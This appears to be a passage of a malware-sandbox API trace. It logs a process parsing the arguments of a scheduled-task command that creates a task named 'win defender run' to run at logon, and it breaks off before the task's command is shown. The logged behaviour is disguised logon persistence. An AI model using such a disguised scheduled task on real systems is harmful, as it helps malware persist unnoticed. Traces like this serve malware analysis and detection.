[0176.659] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.659] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0176.659] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0176.659] lstrlenW (lpString="|create|") returned 8 [0176.659] lstrlenW (lpString="|tn|") returned 4 [0176.659] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0176.659] RtlRestoreLastWin32Error () returned 0x490 [0176.659] lstrlenW (lpString="?") returned 1 [0176.659] lstrlenW (lpString="?") returned 1 [0176.659] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.659] lstrlenW (lpString="tn") returned 2 [0176.659] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.660] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3 [0176.660] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0176.660] lstrlenW (lpString="|?|") returned 3 [0176.660] lstrlenW (lpString="|tn|") returned 4 [0176.660] RtlRestoreLastWin32Error () returned 0x490 [0176.660] lstrlenW (lpString="s") returned 1 [0176.660] lstrlenW (lpString="s") returned 1 [0176.660] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.660] lstrlenW (lpString="tn") returned 2 [0176.660] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.660] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3 [0176.660] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0176.660] lstrlenW (lpString="|s|") returned 3 [0176.660] lstrlenW (lpString="|tn|") returned 4 [0176.660] RtlRestoreLastWin32Error () returned 0x490 [0176.660] lstrlenW (lpString="u") returned 1 [0176.660] lstrlenW (lpString="u") returned 1 [0176.660] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.660] lstrlenW (lpString="tn") returned 2 [0176.660] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.660] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3 [0176.660] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0176.661] lstrlenW (lpString="|u|") returned 3 [0176.661] lstrlenW (lpString="|tn|") returned 4 [0176.661] RtlRestoreLastWin32Error () returned 0x490 [0176.661] lstrlenW (lpString="p") returned 1 [0176.661] lstrlenW (lpString="p") returned 1 [0176.661] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.661] lstrlenW (lpString="tn") returned 2 [0176.661] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.661] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3 [0176.661] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0176.661] lstrlenW (lpString="|p|") returned 3 [0176.661] lstrlenW (lpString="|tn|") returned 4 [0176.661] RtlRestoreLastWin32Error () returned 0x490 [0176.661] lstrlenW (lpString="ru") returned 2 [0176.661] lstrlenW (lpString="ru") returned 2 [0176.661] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.661] lstrlenW (lpString="tn") returned 2 [0176.661] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.661] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4 [0176.661] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0176.661] lstrlenW (lpString="|ru|") returned 4 [0176.661] lstrlenW (lpString="|tn|") returned 4 [0176.661] StrStrIW (lpFirst="|ru|", lpSrch="|tn|") returned 0x0 [0176.662] RtlRestoreLastWin32Error () returned 0x490 [0176.662] lstrlenW (lpString="rp") returned 2 [0176.662] lstrlenW (lpString="rp") returned 2 [0176.662] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.662] lstrlenW (lpString="tn") returned 2 [0176.662] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.662] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4 [0176.662] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0176.662] lstrlenW (lpString="|rp|") returned 4 [0176.662] lstrlenW (lpString="|tn|") returned 4 [0176.662] StrStrIW (lpFirst="|rp|", lpSrch="|tn|") returned 0x0 [0176.662] RtlRestoreLastWin32Error () returned 0x490 [0176.662] lstrlenW (lpString="sc") returned 2 [0176.662] lstrlenW (lpString="sc") returned 2 [0176.662] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.662] lstrlenW (lpString="tn") returned 2 [0176.662] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.662] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0176.662] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0176.662] lstrlenW (lpString="|sc|") returned 4 [0176.662] lstrlenW (lpString="|tn|") returned 4 [0176.662] StrStrIW (lpFirst="|sc|", lpSrch="|tn|") returned 0x0 [0176.662] RtlRestoreLastWin32Error () returned 0x490 [0176.662] lstrlenW (lpString="mo") returned 2 [0176.662] lstrlenW (lpString="mo") returned 2 [0176.662] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.662] lstrlenW (lpString="tn") returned 2 [0176.663] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.663] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0176.663] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0176.663] lstrlenW (lpString="|mo|") returned 4 [0176.663] lstrlenW (lpString="|tn|") returned 4 [0176.663] StrStrIW (lpFirst="|mo|", lpSrch="|tn|") returned 0x0 [0176.663] RtlRestoreLastWin32Error () returned 0x490 [0176.663] lstrlenW (lpString="d") returned 1 [0176.663] lstrlenW (lpString="d") returned 1 [0176.663] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.663] lstrlenW (lpString="tn") returned 2 [0176.663] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.663] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3 [0176.663] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0176.663] lstrlenW (lpString="|d|") returned 3 [0176.663] lstrlenW (lpString="|tn|") returned 4 [0176.663] RtlRestoreLastWin32Error () returned 0x490 [0176.663] lstrlenW (lpString="m") returned 1 [0176.663] lstrlenW (lpString="m") returned 1 [0176.663] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.663] lstrlenW (lpString="tn") returned 2 [0176.663] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.663] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3 [0176.664] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0176.664] lstrlenW (lpString="|m|") returned 3 [0176.664] lstrlenW (lpString="|tn|") returned 4 [0176.664] RtlRestoreLastWin32Error () returned 0x490 [0176.664] lstrlenW (lpString="i") returned 1 [0176.664] lstrlenW (lpString="i") returned 1 [0176.664] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.664] lstrlenW (lpString="tn") returned 2 [0176.664] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.664] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3 [0176.664] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0176.664] lstrlenW (lpString="|i|") returned 3 [0176.664] lstrlenW (lpString="|tn|") returned 4 [0176.664] RtlRestoreLastWin32Error () returned 0x490 [0176.664] lstrlenW (lpString="tn") returned 2 [0176.664] lstrlenW (lpString="tn") returned 2 [0176.664] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.664] lstrlenW (lpString="tn") returned 2 [0176.665] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.665] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0176.665] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0176.665] lstrlenW (lpString="|tn|") returned 4 [0176.665] lstrlenW (lpString="|tn|") returned 4 [0176.665] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|" [0176.665] RtlRestoreLastWin32Error () returned 0x0 [0176.665] RtlRestoreLastWin32Error () returned 0x0 [0176.665] lstrlenW (lpString="win defender run") returned 16 [0176.665] lstrlenW (lpString="-/") returned 2 [0176.665] StrChrIW (lpStart="-/", wMatch=0x300077) returned 0x0 [0176.665] RtlRestoreLastWin32Error () returned 0x490 [0176.665] RtlRestoreLastWin32Error () returned 0x490 [0176.665] RtlRestoreLastWin32Error () returned 0x0 [0176.665] lstrlenW (lpString="win defender run") returned 16 [0176.665] StrChrIW (lpStart="win defender run", wMatch=0x3a) returned 0x0 [0176.665] RtlRestoreLastWin32Error () returned 0x490 [0176.665] RtlRestoreLastWin32Error () returned 0x0 [0176.665] lstrlenW (lpString="win defender run") returned 16 [0176.665] RtlRestoreLastWin32Error () returned 0x0 [0176.665] RtlRestoreLastWin32Error () returned 0x0 [0176.665] lstrlenW (lpString="/sc") returned 3 [0176.665] lstrlenW (lpString="-/") returned 2 [0176.665] StrChrIW (lpStart="-/", wMatch=0x30002f) returned="/" [0176.665] lstrlenW (lpString="create") returned 6 [0176.665] lstrlenW (lpString="create") returned 6 [0176.665] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.665] lstrlenW (lpString="sc") returned 2 [0176.665] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.666] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0176.666] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0176.666] lstrlenW (lpString="|create|") returned 8 [0176.666] lstrlenW (lpString="|sc|") returned 4 [0176.666] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0176.666] RtlRestoreLastWin32Error () returned 0x490 [0176.666] lstrlenW (lpString="?") returned 1 [0176.666] lstrlenW (lpString="?") returned 1 [0176.666] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.666] lstrlenW (lpString="sc") returned 2 [0176.666] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.666] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3 [0176.666] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0176.666] lstrlenW (lpString="|?|") returned 3 [0176.666] lstrlenW (lpString="|sc|") returned 4 [0176.666] RtlRestoreLastWin32Error () returned 0x490 [0176.666] lstrlenW (lpString="s") returned 1 [0176.666] lstrlenW (lpString="s") returned 1 [0176.666] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.666] lstrlenW (lpString="sc") returned 2 [0176.666] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.666] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3 [0176.666] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0176.667] lstrlenW (lpString="|s|") returned 3 [0176.667] lstrlenW (lpString="|sc|") returned 4 [0176.667] RtlRestoreLastWin32Error () returned 0x490 [0176.667] lstrlenW (lpString="u") returned 1 [0176.667] lstrlenW (lpString="u") returned 1 [0176.667] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.667] lstrlenW (lpString="sc") returned 2 [0176.667] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.667] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3 [0176.667] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0176.667] lstrlenW (lpString="|u|") returned 3 [0176.667] lstrlenW (lpString="|sc|") returned 4 [0176.667] RtlRestoreLastWin32Error () returned 0x490 [0176.667] lstrlenW (lpString="p") returned 1 [0176.667] lstrlenW (lpString="p") returned 1 [0176.667] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.667] lstrlenW (lpString="sc") returned 2 [0176.667] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.667] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3 [0176.667] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0176.667] lstrlenW (lpString="|p|") returned 3 [0176.667] lstrlenW (lpString="|sc|") returned 4 [0176.667] RtlRestoreLastWin32Error () returned 0x490 [0176.667] lstrlenW (lpString="ru") returned 2 [0176.667] lstrlenW (lpString="ru") returned 2 [0176.667] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.667] lstrlenW (lpString="sc") returned 2 [0176.668] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.668] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4 [0176.668] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0176.668] lstrlenW (lpString="|ru|") returned 4 [0176.668] lstrlenW (lpString="|sc|") returned 4 [0176.668] StrStrIW (lpFirst="|ru|", lpSrch="|sc|") returned 0x0 [0176.668] RtlRestoreLastWin32Error () returned 0x490 [0176.668] lstrlenW (lpString="rp") returned 2 [0176.668] lstrlenW (lpString="rp") returned 2 [0176.668] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.767] lstrlenW (lpString="sc") returned 2 [0176.767] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.767] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4 [0176.767] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0176.767] lstrlenW (lpString="|rp|") returned 4 [0176.767] lstrlenW (lpString="|sc|") returned 4 [0176.768] StrStrIW (lpFirst="|rp|", lpSrch="|sc|") returned 0x0 [0176.768] RtlRestoreLastWin32Error () returned 0x490 [0176.768] lstrlenW (lpString="sc") returned 2 [0176.768] lstrlenW (lpString="sc") returned 2 [0176.768] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.768] lstrlenW (lpString="sc") returned 2 [0176.768] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.768] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0176.768] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0176.768] lstrlenW (lpString="|sc|") returned 4 [0176.768] lstrlenW (lpString="|sc|") returned 4 [0176.769] StrStrIW (lpFirst="|sc|", lpSrch="|sc|") returned="|sc|" [0176.769] RtlRestoreLastWin32Error () returned 0x0 [0176.769] RtlRestoreLastWin32Error () returned 0x0 [0176.769] lstrlenW (lpString="ONLOGON") returned 7 [0176.769] lstrlenW (lpString="-/") returned 2 [0176.769] StrChrIW (lpStart="-/", wMatch=0x30004f) returned 0x0 [0176.769] RtlRestoreLastWin32Error () returned 0x490 [0176.769] RtlRestoreLastWin32Error () returned 0x490 [0176.769] RtlRestoreLastWin32Error () returned 0x0 [0176.769] lstrlenW (lpString="ONLOGON") returned 7 [0176.769] StrChrIW (lpStart="ONLOGON", wMatch=0x3a) returned 0x0 [0176.769] RtlRestoreLastWin32Error () returned 0x490 [0176.769] RtlRestoreLastWin32Error () returned 0x0 [0176.769] GetProcessHeap () returned 0x47c0000 [0176.769] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47cac48 [0176.770] _memicmp (_Buf1=0x47cac48, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.770] lstrlenW (lpString="ONLOGON") returned 7 [0176.770] GetProcessHeap () returned 0x47c0000 [0176.770] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0xc, Size=0x10) returned 0x47cabe8 [0176.770] lstrlenW (lpString="ONLOGON") returned 7 [0176.770] lstrlenW (lpString=" \x09") returned 2 [0176.770] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0176.770] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0176.770] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0176.770] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0176.770] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0176.771] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0176.771] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0176.771] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0176.771] GetLastError () returned 0x0 [0176.771] lstrlenW (lpString="ONLOGON") returned 7 [0176.771] lstrlenW (lpString="ONLOGON") returned 7 [0176.771] RtlRestoreLastWin32Error () returned 0x0 [0176.771] RtlRestoreLastWin32Error () returned 0x0 [0176.771] lstrlenW (lpString="/tr") returned 3 [0176.771] lstrlenW (lpString="-/") returned 2 [0176.771] StrChrIW (lpStart="-/", wMatch=0x30002f) returned="/" [0176.771] lstrlenW (lpString="create") returned 6 [0176.771] lstrlenW (lpString="create") returned 6 [0176.771] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.771] lstrlenW (lpString="tr") returned 2 [0176.771] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.772] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0176.772] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0176.772] lstrlenW (lpString="|create|") returned 8 [0176.772] lstrlenW (lpString="|tr|") returned 4 [0176.772] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0176.772] RtlRestoreLastWin32Error () returned 0x490 [0176.772] lstrlenW (lpString="?") returned 1 [0176.772] lstrlenW (lpString="?") returned 1 [0176.772] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.772] lstrlenW (lpString="tr") returned 2 [0176.772] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.772] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3 [0176.772] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0176.772] lstrlenW (lpString="|?|") returned 3 [0176.772] lstrlenW (lpString="|tr|") returned 4 [0176.772] RtlRestoreLastWin32Error () returned 0x490 [0176.772] lstrlenW (lpString="s") returned 1 [0176.772] lstrlenW (lpString="s") returned 1 [0176.772] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.772] lstrlenW (lpString="tr") returned 2 [0176.772] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.772] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3 [0176.772] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0176.773] lstrlenW (lpString="|s|") returned 3 [0176.773] lstrlenW (lpString="|tr|") returned 4 [0176.773] RtlRestoreLastWin32Error () returned 0x490 [0176.773] lstrlenW (lpString="u") returned 1 [0176.773] lstrlenW (lpString="u") returned 1 [0176.773] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.773] lstrlenW (lpString="tr") returned 2 [0176.773] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.773] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3 [0176.773] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0176.773] lstrlenW (lpString="|u|") returned 3 [0176.773] lstrlenW (lpString="|tr|") returned 4 [0176.773] RtlRestoreLastWin32Error () returned 0x490 [0176.773] lstrlenW (lpString="p") returned 1 [0176.773] lstrlenW (lpString="p") returned 1 [0176.773] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.773] lstrlenW (lpString="tr") returned 2 [0176.773] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.773] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3 [0176.773] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0176.773] lstrlenW (lpString="|p|") returned 3 [0176.773] lstrlenW (lpString="|tr|") returned 4 [0176.774] RtlRestoreLastWin32Error () returned 0x490 [0176.774] lstrlenW (lpString="ru") returned 2 [0176.774] lstrlenW (lpString="ru") returned 2 [0176.774] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.774] lstrlenW (lpString="tr") returned 2 [0176.774] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.774] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4 [0176.774] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0176.774] lstrlenW (lpString="|ru|") returned 4 [0176.774] lstrlenW (lpString="|tr|") returned 4 [0176.774] StrStrIW (lpFirst="|ru|", lpSrch="|tr|") returned 0x0 [0176.774] RtlRestoreLastWin32Error () returned 0x490 [0176.774] lstrlenW (lpString="rp") returned 2 [0176.774] lstrlenW (lpString="rp") returned 2 [0176.774] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.774] lstrlenW (lpString="tr") returned 2 [0176.774] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.774] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4 [0176.774] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0176.774] lstrlenW (lpString="|rp|") returned 4 [0176.774] lstrlenW (lpString="|tr|") returned 4 [0176.775] StrStrIW (lpFirst="|rp|", lpSrch="|tr|") returned 0x0 [0176.775] RtlRestoreLastWin32Error () returned 0x490 [0176.775] lstrlenW (lpString="sc") returned 2 [0176.775] lstrlenW (lpString="sc") returned 2 [0176.775] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.775] lstrlenW (lpString="tr") returned 2 [0176.775] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.775] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0176.775] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0176.775] lstrlenW (lpString="|sc|") returned 4 [0176.775] lstrlenW (lpString="|tr|") returned 4 [0176.775] StrStrIW (lpFirst="|sc|", lpSrch="|tr|") returned 0x0 [0176.775] RtlRestoreLastWin32Error () returned 0x490 [0176.775] lstrlenW (lpString="mo") returned 2 [0176.775] lstrlenW (lpString="mo") returned 2 [0176.775] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.775] lstrlenW (lpString="tr") returned 2 [0176.775] _memicmp (_Buf1=0x47c75f8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.775] _vsnwprintf (in: _Buffer=0x47c9478, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0176.775] _vsnwprintf (in: _Buffer=0x47c9438, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0176.776] lstrlenW (lpString="|mo|") returned 4 [0176.776] lstrlenW (lpString="|tr|") returned 4 [0176.776] StrStrIW (lpFirst="|mo|", lpSrch="|tr|") returned 0x0 [0176.776] RtlRestoreLastWin32Error () returned 0x490 [0176.776] lstrlenW (lpString="d") returned 1 [0176.776] lstrlenW (lpString="d") returned 1 [0176.776] _memicmp (_Buf1=0x47c75c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0176.776] lstrlenW (lpString="tr") returned 2 [0176.776] _memicmp (_Buf1=0x47c75f8, 